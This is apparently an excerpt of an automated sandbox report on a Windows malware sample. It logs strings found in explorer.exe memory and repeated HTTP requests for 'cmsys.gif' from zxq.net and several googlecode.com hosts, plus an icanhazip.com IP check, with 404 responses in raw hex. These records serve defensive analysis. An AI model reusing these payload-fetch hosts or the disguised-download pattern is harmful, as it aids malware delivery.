                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-includes/wlwmanifest.xml
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-json/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fzxq.net%2Fwhat-happened-to-the-old-zxq-we
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-json/wp/v2/pages/187
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/write-for-us/
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/xmlrpc.php?rsd
                Source: unknownDNS traffic detected: queries for: 64.89.4.0.in-addr.arpa
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:28 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:30 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:09:33 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:09:49 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:09:51 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:09:54 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:06 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:10 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:12 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:23 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:26 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:28 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:40 GMT
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Fri, 05 Aug 2022 07:10:42 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 
77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 
77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 